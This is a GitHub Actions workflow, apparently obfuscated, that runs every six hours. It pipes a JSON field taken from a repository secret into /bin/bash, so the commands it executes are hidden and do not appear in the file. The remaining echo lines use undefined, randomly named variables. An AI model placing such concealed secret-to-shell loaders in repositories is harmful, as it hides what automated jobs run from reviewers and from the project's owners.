name: youshigeliao
on:
  workflow_dispatch:
  schedule:
    - cron: '13 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: youshigeliao
        env:
          fcwn694: ${{ secrets.fcwn694 }}
        run: |
          echo $fcwn694 | jq -r .kxrl153 | /bin/bash
          echo $n438 | jq -r .c273 | /bin/bash
          echo $cldg232 | jq -r .lrcg1380 | /bin/bash
          echo $qtkub5 | jq -r .inrl74413 | /bin/bash
          echo $wshes340 | jq -r .lr3597 | /bin/bash
          echo $r7725 | jq -r .oyh75 | /bin/bash
          echo $onwrv43 | jq -r .aghgf205 | /bin/bash
          echo $ycwct8 | jq -r .tj58066 | /bin/bash
          echo $ydf85 | jq -r .gdjl27 | /bin/bash
          echo $vuhzl90 | jq -r .q93439 | /bin/bash
          echo $dcp7 | jq -r .qh73485 | /bin/bash
          echo $ciakx13598 | jq -r .fqsu2636 | /bin/bash
          echo $dvs1319 | jq -r .q4204 | /bin/bash

